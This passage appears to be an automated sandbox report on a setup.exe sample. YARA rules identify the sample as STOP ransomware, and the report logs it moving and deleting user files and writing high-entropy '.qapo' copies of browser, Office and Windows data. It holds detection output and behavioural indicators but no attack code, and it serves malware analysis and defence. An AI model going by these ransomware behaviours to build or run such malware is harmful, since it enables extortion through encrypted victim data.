        Source: Yara matchFile source: Process Memory Space: setup.exe PID: 7036, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: setup.exe PID: 5252, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: setup.exe PID: 4232, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: setup.exe PID: 6416, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: setup.exe PID: 3816, type: MEMORYSTR
        Source: C:\Users\user\Desktop\setup.exeFile moved: C:\Users\user\Desktop\MXPXCVPDVN\NEBFQQYWPS.jpgJump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile deleted: C:\Users\user\Desktop\MXPXCVPDVN\NEBFQQYWPS.jpgJump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile moved: C:\Users\user\Desktop\MXPXCVPDVN.docxJump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile deleted: C:\Users\user\Desktop\MXPXCVPDVN.docxJump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile moved: C:\Users\user\Desktop\SFPUSAFIOL\PIVFAGEAAV.mp3Jump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{6f6a6616-c437-4533-b6a1-6b30da29cd38}\0.0.filtertrie.intermediate.txt -> decryption settings~decrease zoom level~decrease volume~decrease mouse speed~decrease mouse acceleration~decrease brightness~decode~decice~deault~deaf~deafult~ddevice~daylight saving time on or off~davice~dates~date time~date settings~date and time~date and time settings~date and time from a time server~date and time formats~data~data you send to microsoft~data viewer~data usage overview~data to improve narrator~data systemwide~data settings~data sense~data saver~data restore~data plan~data limit~data instead of wifi~data for all apps~data connection with other devices~data captured by windows mixed reality~dark~darker touch feedback~dark theme~dark theme settings~dark mode systemwide~dark mode settings~dark mode for apps~dark colours~dark colors~dafault~c~cutting and pasting~cut and paste~customizing~customize~customize narrator sounds setting~customize narrator sound effects setting~customising~custJump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{ac01b07d-c9ac-4d31-8220-3dc6d7aa0576}\0.0.filtertrie.intermediate.txt -> decryption settings~decrease zoom level~decrease volume~decrease mouse speed~decrease mouse acceleration~decrease brightness~decode~decice~deault~deaf~deafult~ddevice~daylight saving time on or off~davice~dates~date time~date settings~date and time~date and time settings~date and time from a time server~date and time formats~data~data you send to microsoft~data viewer~data usage overview~data to improve narrator~data systemwide~data settings~data sense~data saver~data restore~data plan~data limit~data instead of wifi~data for all apps~data connection with other devices~data captured by windows mixed reality~dark~darker touch feedback~dark theme~dark theme settings~dark mode systemwide~dark mode settings~dark mode for apps~dark colours~dark colors~dafault~c~cutting and pasting~cut and paste~customizing~customize~customize narrator sounds setting~customize narrator sound effects setting~customising~custJump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt -> decryption settings;change encryption settings"}},{"system.parsingname":{"type":12,"value":"aaa_settingspagedevices.settingcontent-ms"},"system.setting.fontfamily":{"type":12,"value":"segoe mdl2 assets"},"system.setting.glyph":{"type":12,"value":""},"system.setting.pageid":{"type":12,"value":"settingspagedevices"},"system.comment":{"type":12,"value":"bluetooth and other devices settings"},"system.highkeywords":{"type":12,"value":"device;projector;projectors;pair bluetooth device;unpair device;pair device;bluetooth settings;add bluetooth device;add device"}},{"system.parsingname":{"type":12,"value":"aaa_settingspagedevicespen-2.settingcontent-ms"},"system.setting.fontfamily":{"type":12,"value":"segoe mdl2 assets"},"system.setting.glyph":{"type":12,"value":""},"system.setting.pageid":{"type":12,"value":"settingspagedevicespen"},"system.comment":{"type":12,"value":"pen and windows ink settings"},"system.highkeywords":{"type":12,"value":"pens;handedness;cursor;cursors;writing;write;workspace;pen shortcuts;hJump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{c82d26a9-b16c-48ba-9444-88303f538f65}\settingssynonyms.txt entropy: 7.99840276477Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{c82d26a9-b16c-48ba-9444-88303f538f65}\settingsglobals.txt entropy: 7.99553105794Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm\Gmail.ico entropy: 7.99875770736Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf\Sheets.ico entropy: 7.99866045258Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml\YouTube.ico entropy: 7.99839031517Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak\Google Drive.ico entropy: 7.99886477172Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb\Docs.ico entropy: 7.99877020176Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag\Slides.ico entropy: 7.99900433581Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\MOJJRSYN\7\-U2ww19iycr3M_DiD25JdVUDdqk.br[1].js entropy: 7.99803296024Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\MOJJRSYN\7\aABLNT_FV45QjYQfnRHrBCAk4GU[1].js entropy: 7.99854518234Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\MOJJRSYN\7\5_KhThI0onehz_-3sl58j0dOeLI.br[1].js entropy: 7.99866853556Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\MOJJRSYN\7\584482RVjBIoEvVSe0RsuS1I4YQ.br[1].js entropy: 7.99601981824Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\MOJJRSYN\7\Init[1].htm entropy: 7.99838167446Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\MOJJRSYN\7\DccpWCpoNzCwM4Qymi_Ji67Ilso.br[1].js entropy: 7.99845750404Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin entropy: 7.99731038945Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\first_party_sets.db entropy: 7.99691636103Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Microsoft\input\en-GB\userdict_v1.0809.dat entropy: 7.99127630069Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db entropy: 7.99246053713Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officec2rclient.exe.db entropy: 7.99222023508Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db entropy: 7.99289969604Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officesetup.exe.db entropy: 7.99219642035Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001b.db entropy: 7.99802402117Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001c.db entropy: 7.99828915509Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000004.db entropy: 7.99827356574Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000005.db entropy: 7.99821557456Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl entropy: 7.99176381234Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml entropy: 7.99718821447Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2023-10-05_061938_46c-3e0.log entropy: 7.99437858327Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\MSIMGSIZ.DAT entropy: 7.9968179728Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\MSIMGSIZ.DAT entropy: 7.99593850849Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409603873448744.txt entropy: 7.99796690119Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409603755735310.txt entropy: 7.99830374284Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409603686917468.txt entropy: 7.99801914049Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409602890767950.txt entropy: 7.9978975889Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409604173107312.txt entropy: 7.99847120621Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\MOJJRSYN\7\MgSq5EEOyYvlI1qVlLOXfgRHmzM.br[1].js entropy: 7.9982204004Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\MOJJRSYN\7\mb8fkd60iW7q4wvyDIlCm9OOn10.br[1].js entropy: 7.99617270812Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\MOJJRSYN\7\pqKAmz-4RXsuUf_YO-8_wQDepUQ.br[1].js entropy: 7.99481051489Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\MOJJRSYN\7\onra7PQl9o5bYT2lASI1BE4DDEs[1].css entropy: 7.99716509452Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\MOJJRSYN\7\tIa_X3QDXj2Izj2HpQ_Mo9f1WiM.br[1].js entropy: 7.99852785901Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\MOJJRSYN\7\uANxnX_BheDjd2-cdR8N9DEWlds[1].css entropy: 7.99122366053Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\MOJJRSYN\7\yNwdh0ra_6sDoSuCVMI8Wjl58UM.br[1].js entropy: 7.9978300399Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\MOJJRSYN\7\YfXD9vOw8__a60l-k1HNCxSbem4.br[1].js entropy: 7.99663658575Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\MOJJRSYN\7\xIW3D5oXL8xIpGjHoiGVJS_B4mg.br[1].js entropy: 7.99720380403Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\eventpage_bin_prod.js entropy: 7.99761212335Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\eventpage_bin_prod.js entropy: 7.99788190904Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\DQECM999\www.bing[1].xml entropy: 7.99594166589Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-tokenization-config.json entropy: 7.99320173802Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-checkout-eligible-sites-pre-stable.json entropy: 7.99876666949Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\super_coupon.json entropy: 7.99088416063Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shm entropy: 7.99458560992Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite entropy: 7.99628737487Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shm entropy: 7.99415648834Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite entropy: 7.99580373068Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shm entropy: 7.99408234563Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite entropy: 7.99564014591Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shm entropy: 7.99394807274Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite entropy: 7.99614217596Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shm entropy: 7.99419181624Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite entropy: 7.99662230659Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409604779873335.txt entropy: 7.99819820945Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409604473729424.txt entropy: 7.99799301968Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\flapper.gif entropy: 7.99729457259Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shm entropy: 7.99492026277Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409611829881178.txt entropy: 7.99836347263Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409611734040046.txt entropy: 7.99835376347Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409611536865225.txt entropy: 7.99869312361Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409610265331693.txt entropy: 7.99857591013Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409609587090804.txt entropy: 7.99850785951Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409608313396144.txt entropy: 7.99836899718Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409607532982526.txt entropy: 7.9981156757Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409605511411373.txt entropy: 7.99826442817Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409605028834776.txt entropy: 7.99835831249Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409604847938702.txt entropy: 7.99835102126Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\IDX_CONTENT_TASKBARHEADLINES.json entropy: 7.99842124528Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\GLEAM-LIGHT.svg entropy: 7.99368662333Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\GLEAM-DARK.svg entropy: 7.99264334878Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133667678938803925.txt entropy: 7.99852692565Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133667678638377785.txt entropy: 7.99845267738Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409618620166650.txt entropy: 7.99835015039Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409618348757513.txt entropy: 7.99831574539Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409618156106430.txt entropy: 7.99841156229Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\ls-archive.sqlite entropy: 7.99866240947Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl entropy: 7.99693044767Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log entropy: 7.99514486694Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db entropy: 7.99369798987Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db entropy: 7.99026697547Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeEDrop\EdgeEDropSQLite.db entropy: 7.99578590775Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\EADPData Component\4.0.2.33\data.txt entropy: 7.99779164821Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\Local Settings\Adobe\Acrobat\DC\UserCache64.bin.qapo (copy) entropy: 7.99731038945Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\Local Settings\Google\Chrome\User Data\first_party_sets.db.qapo (copy) entropy: 7.99691636103Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\Local Settings\Microsoft\input\en-GB\userdict_v1.0809.dat.qapo (copy) entropy: 7.99127630069Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\Local Settings\Microsoft\Office\OTele\excel.exe.db.qapo (copy) entropy: 7.99246053713Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\Local Settings\Microsoft\Office\OTele\officec2rclient.exe.db.qapo (copy) entropy: 7.99222023508Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\Local Settings\Microsoft\Office\OTele\officeclicktorun.exe.db.qapo (copy) entropy: 7.99289969604Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\Local Settings\Microsoft\Office\OTele\officesetup.exe.db.qapo (copy) entropy: 7.99219642035Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001b.db.qapo (copy) entropy: 7.99802402117Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001c.db.qapo (copy) entropy: 7.99828915509Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000004.db.qapo (copy) entropy: 7.99827356574Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000005.db.qapo (copy) entropy: 7.99821557456Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl.qapo (copy) entropy: 7.99176381234Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\Shell\DefaultLayouts.xml.qapo (copy) entropy: 7.99718821447Jump to dropped file

        System Summary

        barindex
        Source: 7.2.setup.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 7.2.setup.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 11.2.setup.exe.20d15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 11.2.setup.exe.20d15a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 17.2.setup.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 17.2.setup.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 0.2.setup.exe.20115a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 0.2.setup.exe.20115a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 2.2.setup.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 2.2.setup.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 5.2.setup.exe.20715a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 5.2.setup.exe.20715a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 12.2.setup.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 12.2.setup.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 11.2.setup.exe.20d15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 11.2.setup.exe.20d15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
